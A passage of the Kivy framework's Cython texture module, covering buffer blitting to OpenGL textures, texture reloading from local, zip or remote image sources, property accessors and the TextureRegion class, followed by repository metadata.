`pos`: tuple, defaults to (0, 0)
Position to blit in the texture.
`bufferfmt`: str, defaults to 'ubyte'
Type of the data buffer, can be one of 'ubyte', 'ushort',
'uint', 'byte', 'short', 'int' or 'float'.
`mipmap_level`: int, defaults to 0
Indicate which mipmap level we are going to update.
`mipmap_generation`: bool, defaults to True
Indicate if we need to regenerate the mipmap from level 0.
.. versionchanged:: 1.0.7
added `mipmap_level` and `mipmap_generation`
.. versionchanged:: 1.9.0
`pbuffer` can now be any class instance that implements the python
buffer interface and / or memoryviews thereof.
'''
cdef GLuint target = self._target
cdef int glbufferfmt
if colorfmt is None:
colorfmt = 'rgb'
if bufferfmt is None:
bufferfmt = 'ubyte'
if pos is None:
pos = (0, 0)
if size is None:
size = self.size
glbufferfmt = _buffer_fmt_to_gl(bufferfmt)
# gles limitation/issue: cannot blit buffer on a different
# buffer/colorfmt
# Reference: https://github.com/kivy/kivy/issues/1600
if gles_limts:
if colorfmt.lower() != self.colorfmt.lower():
raise Exception((
"GLES LIMIT: Cannot blit with a different colorfmt than "
"the created texture. (texture has {}, you passed {}). "
"Consider setting KIVY_GLES_LIMITS"
).format(self.colorfmt, colorfmt))
if bufferfmt.lower() != self.bufferfmt.lower():
raise Exception((
"GLES LIMIT: Cannot blit with a different bufferfmt than "
"the created texture. (texture has {}, you passed {}). "
"Consider setting KIVY_GLES_LIMITS"
).format(self.bufferfmt, bufferfmt))
# bind the texture, and create anything that should be created at this
# time.
self.bind()
# need conversion, do check here because it seems to be faster ?
if not gl_has_texture_native_format(colorfmt):
pbuffer, colorfmt = convert_to_gl_format(pbuffer, colorfmt,
size[0], size[1])
cdef char [:] char_view
cdef short [:] short_view
cdef unsigned short [:] ushort_view
cdef int [:] int_view
cdef unsigned int [:] uint_view
cdef float [:] float_view
cdef char *cdata = NULL
cdef long datasize = 0
if isinstance(pbuffer, bytes): # if it's bytes, just use memory
cdata = <bytes>pbuffer # explicit bytes
datasize = <long>len(pbuffer)
else: # if it's a memoryview or buffer type, use start of memory
if glbufferfmt == GL_UNSIGNED_BYTE or glbufferfmt == GL_BYTE:
char_view = pbuffer
cdata = &char_view[0]
datasize = char_view.nbytes
elif glbufferfmt == GL_SHORT:
short_view = pbuffer
cdata = <char *>&short_view[0]
datasize = short_view.nbytes
elif glbufferfmt == GL_UNSIGNED_SHORT:
ushort_view = pbuffer
cdata = <char *>&ushort_view[0]
datasize = ushort_view.nbytes
elif glbufferfmt == GL_INT:
int_view = pbuffer
cdata = <char *>&int_view[0]
datasize = int_view.nbytes
elif glbufferfmt == GL_UNSIGNED_INT:
uint_view = pbuffer
cdata = <char *>&uint_view[0]
datasize = uint_view.nbytes
elif glbufferfmt == GL_FLOAT:
float_view = pbuffer
cdata = <char *>&float_view[0]
datasize = float_view.nbytes
# prepare nogil
cdef int iglfmt = _color_fmt_to_gl(self._icolorfmt)
cdef int glfmt = _color_fmt_to_gl(colorfmt)
cdef int x = pos[0]
cdef int y = pos[1]
cdef int w = size[0]
cdef int h = size[1]
cdef int is_allocated = self._is_allocated
cdef int is_compressed = _is_compressed_fmt(colorfmt)
cdef int _mipmap_generation = mipmap_generation and self._mipmap
cdef int _mipmap_level = mipmap_level
# if there is a pitch/rowlength passed for the texture,
# determine the alignment needed, and see if GL can handle it on the
# current platform.
cdef int bytes_per_pixels = _gl_format_size(glfmt)
cdef int target_rowlength = w * bytes_per_pixels * _buffer_type_to_gl_size(bufferfmt)
cdef int need_unpack = rowlength > 0 and rowlength != target_rowlength
cdef char *cpdata = NULL
cdef char *cpsrc
cdef char *cpdst
cdef int i
cdef int require_subimage = 0
# if the hardware doesn't support native unpack, use alternative method.
if need_unpack and not gl_has_capability(GLCAP_UNPACK_SUBIMAGE):
require_subimage = 1
need_unpack = 0
with nogil:
if need_unpack:
# native unpack supported, use it.
cgl.glPixelStorei(GL_UNPACK_ROW_LENGTH, rowlength / bytes_per_pixels)
if y != 0:
cgl.glPixelStorei(GL_UNPACK_SKIP_ROWS, y)
if x != 0:
cgl.glPixelStorei(GL_UNPACK_SKIP_PIXELS, x)
_gl_prepare_pixels_upload(rowlength)
elif require_subimage:
# make a temporary copy to a format without alignment for upload
cpsrc = cdata
cpdst = cpdata = <char *>malloc(target_rowlength * h)
for i in range(h):
memcpy(cpdst, cpsrc, target_rowlength)
cpsrc += rowlength
cpdst += target_rowlength
cdata = cpdata
datasize = target_rowlength * h
else:
_gl_prepare_pixels_upload(w)
if is_compressed:
cgl.glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
cgl.glCompressedTexImage2D(target, _mipmap_level, glfmt, w, h, 0,
<GLsizei>datasize, cdata)
elif is_allocated:
cgl.glTexSubImage2D(target, _mipmap_level, x, y, w, h, glfmt,
glbufferfmt, cdata)
else:
cgl.glTexImage2D(target, _mipmap_level, iglfmt, w, h, 0, glfmt,
glbufferfmt, cdata)
if _mipmap_generation:
cgl.glGenerateMipmap(target)
if need_unpack:
cgl.glPixelStorei(GL_UNPACK_ROW_LENGTH, 0)
if y != 0:
cgl.glPixelStorei(GL_UNPACK_SKIP_ROWS, 0)
if x != 0:
cgl.glPixelStorei(GL_UNPACK_SKIP_PIXELS, 0)
elif require_subimage:
if cpdata != NULL:
free(cpdata)
def _on_proxyimage_loaded(self, image):
if image is not self._proxyimage:
return
self._reload_propagate(image.image.texture)
self._proxyimage = None
# the texture might impact something on the drawing, so ask to refresh
# the window.
# FIXME: the texture used in BindTexture should ask for a retrigger
get_context().flag_update_canvas()
cdef void reload(self):
cdef Texture texture
if self._id != <GLuint>-1:
return
if self._source is None:
# manual texture recreation
texture = texture_create(self.size, self.colorfmt, self.bufferfmt,
self.mipmap)
else:
source = osource = self._source
proto = None
if source.startswith('zip|'):
proto = 'zip'
source = source[4:]
chr = type(source)
no_cache, filename, mipmap, count = source.split(chr('|'))
source = chr(u'{}|{}|{}').format(filename, mipmap, count)
if not proto:
proto = filename.split(chr(':'), 1)[0]
if proto in ('http', 'https', 'ftp', 'smb'):
from kivy.loader import Loader
self._proxyimage = Loader.image(filename)
self._id = 0 # FIXME this will point to an invalid texture ...
self._proxyimage.bind(on_load=self._on_proxyimage_loaded)
if self._proxyimage.loaded:
self._on_proxyimage_loaded(self._proxyimage)
return
mipmap = 0 if mipmap == '0' else 1
if count == '0':
if proto =='zip' or filename.endswith('.gif'):
from kivy.core.image import ImageLoader
image = ImageLoader.load(filename, nocache=True, mipmap=mipmap)
texture_list = []
create_tex = self.create_from_data
for data in image._data[1:]:
tex = create_tex(data, mipmap=mipmap)
texture_list.append(tex)
self._sequenced_textures[filename] = texture_list
else:
from kivy.core.image import Image
image = Image(filename, nocache=True, mipmap=mipmap)
texture = image.texture
else:
item_no = int(count) - 1
texture = self._sequenced_textures[filename][item_no]
self._reload_propagate(texture)
cdef void _reload_propagate(self, Texture texture):
# set the same parameters as our current texture
texture.set_wrap(self.wrap)
texture.set_min_filter(self.min_filter)
texture.set_mag_filter(self.mag_filter)
texture.flags |= TI_MIN_FILTER | TI_MAG_FILTER | TI_WRAP
texture.uvpos = self.uvpos
texture.uvsize = self.uvsize
# ensure the new opengl ID will not get through GC
texture.bind()
self._id = texture.id
texture._nofree = 1
# then update content again
for callback in self.observers[:]:
method = callback()
if method is None:
self.observers.remove(callback)
continue
method(self)
def save(self, filename, flipped=True, fmt=None):
'''Save the texture content to a file. Check
:meth:`kivy.core.image.Image.save` for more information.
The flipped parameter flips the saved image vertically, and
defaults to True.
.. versionadded:: 1.7.0
.. versionchanged:: 1.8.0
Parameter `flipped` added, defaults to True. All the OpenGL Texture
are read from bottom / left, it need to be flipped before saving.
If you don't want to flip the image, set flipped to False.
.. versionchanged:: 1.11.0
Parameter `fmt` added, to pass the final format to the image provider.
Used if filename is a BytesIO
'''
from kivy.core.image import Image
return Image(self).save(filename, flipped=flipped, fmt=fmt)
def __repr__(self):
return '<Texture hash=%r id=%d size=%r colorfmt=%r bufferfmt=%r source=%r observers=%d>' % (
id(self), self._id, self.size, self.colorfmt, self.bufferfmt,
self._source, len(self.observers))
@property
def size(self):
'''Return the (width, height) of the texture (readonly).
'''
return (self.width, self.height)
@property
def mipmap(self):
'''Return True if the texture has mipmap enabled (readonly).
'''
return self._mipmap
@property
def id(self):
'''Return the OpenGL ID of the texture (readonly).
'''
return self._id
@property
def target(self):
'''Return the OpenGL target of the texture (readonly).
'''
return self._target
@property
def width(self):
'''Return the width of the texture (readonly).
'''
return self._width
@property
def height(self):
'''Return the height of the texture (readonly).
'''
return self._height
@property
def tex_coords(self):
'''Return the list of tex_coords (opengl).
'''
return (
self._tex_coords[0],
self._tex_coords[1],
self._tex_coords[2],
self._tex_coords[3],
self._tex_coords[4],
self._tex_coords[5],
self._tex_coords[6],
self._tex_coords[7])
@property
def uvpos(self):
'''Get/set the UV position inside the texture.
'''
return (self._uvx, self._uvy)
@uvpos.setter
def uvpos(self, x):
self._uvx, self._uvy = x
self.update_tex_coords()
@property
def uvsize(self):
'''Get/set the UV size inside the texture.
.. warning::
The size can be negative if the texture is flipped.
'''
return (self._uvw, self._uvh)
@uvsize.setter
def uvsize(self, x):
self._uvw, self._uvh = x
self.update_tex_coords()
@property
def colorfmt(self):
'''Return the color format used in this texture (readonly).
.. versionadded:: 1.0.7
'''
return self._colorfmt
@property
def bufferfmt(self):
'''Return the buffer format used in this texture (readonly).
.. versionadded:: 1.2.0
'''
return self._bufferfmt
@property
def min_filter(self):
'''Get/set the min filter texture. Available values:
- linear
- nearest
- linear_mipmap_linear
- linear_mipmap_nearest
- nearest_mipmap_nearest
- nearest_mipmap_linear
Check the opengl documentation for more information about the behavior
of these values :
http://www.khronos.org/opengles/sdk/docs/man/xhtml/glTexParameter.xml.
'''
return self._min_filter
@min_filter.setter
def min_filter(self, x):
self.set_min_filter(x)
@property
def mag_filter(self):
'''Get/set the mag filter texture. Available values:
- linear
- nearest
Check the opengl documentation for more information about the behavior
of these values :
http://www.khronos.org/opengles/sdk/docs/man/xhtml/glTexParameter.xml.
'''
return self._mag_filter
@mag_filter.setter
def mag_filter(self, x):
self.set_mag_filter(x)
@property
def wrap(self):
'''Get/set the wrap texture. Available values:
- repeat
- mirrored_repeat
- clamp_to_edge
Check the opengl documentation for more information about the behavior
of these values :
http://www.khronos.org/opengles/sdk/docs/man/xhtml/glTexParameter.xml.
'''
return self._wrap
@wrap.setter
def wrap(self, wrap):
self.set_wrap(wrap)
@property
def pixels(self):
'''Get the pixels texture, in RGBA format only, unsigned byte. The
origin of the image is at bottom left.
.. versionadded:: 1.7.0
'''
from kivy.graphics.fbo import Fbo
return Fbo(size=self.size, texture=self).pixels
cdef class TextureRegion(Texture):
'''Handle a region of a Texture class. Useful for non power-of-2
texture handling.'''
def __init__(self, int x, int y, int width, int height, Texture origin):
Texture.__init__(self, width, height, origin.target, origin.id)
self._is_allocated = 1
self._mipmap = origin._mipmap
self._colorfmt = origin._colorfmt
self._bufferfmt = origin._bufferfmt
self._icolorfmt = origin._icolorfmt
self.x = x
self.y = y
self.owner = origin
# recalculate texture coordinate
cdef float origin_u1, origin_v1
origin_u1 = origin._uvx
origin_v1 = origin._uvy
self._uvx = (x / <float>origin._width) * origin._uvw + origin_u1
self._uvy = (y / <float>origin._height) * origin._uvh + origin_v1
self._uvw = (width / <float>origin._width) * origin._uvw
self._uvh = (height / <float>origin._height) * origin._uvh
self.update_tex_coords()
def __repr__(self):
return '<TextureRegion of %r hash=%r id=%d size=%r colorfmt=%r bufferfmt=%r source=%r observers=%d>' % (
self.owner, id(self), self._id, self.size, self.colorfmt,
self.bufferfmt, self._source, len(self.observers))
cdef void reload(self):
# texture region are reloaded _after_ normal texture
# so that could work, except if it's a region of region
# it's safe to retrigger a reload, since the owner texture will be not
# really reloaded if its id is not -1.
self.owner.reload()
self._id = self.owner.id
# then update content again
self.bind()
for callback in self.observers[:]:
method = callback()
if method is None:
self.observers.remove(callback)
continue
method(self)
def ask_update(self, callback):
# redirect to owner
self.owner.ask_update(callback)
cpdef bind(self):
self.owner.bind()
@property
def pixels(self):
from kivy.graphics.fbo import Fbo
from kivy.graphics import Color, Rectangle
fbo = Fbo(size=self.size)
fbo.clear()
self.flip_vertical()
with fbo:
Color(1, 1, 1)
Rectangle(size=self.size, texture=self,
tex_coords=self.tex_coords)
fbo.draw()
self.flip_vertical()
return fbo.pixels
| Cython | 5 | yunus-ceyhan/kivy | kivy/graphics/texture.pyx | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.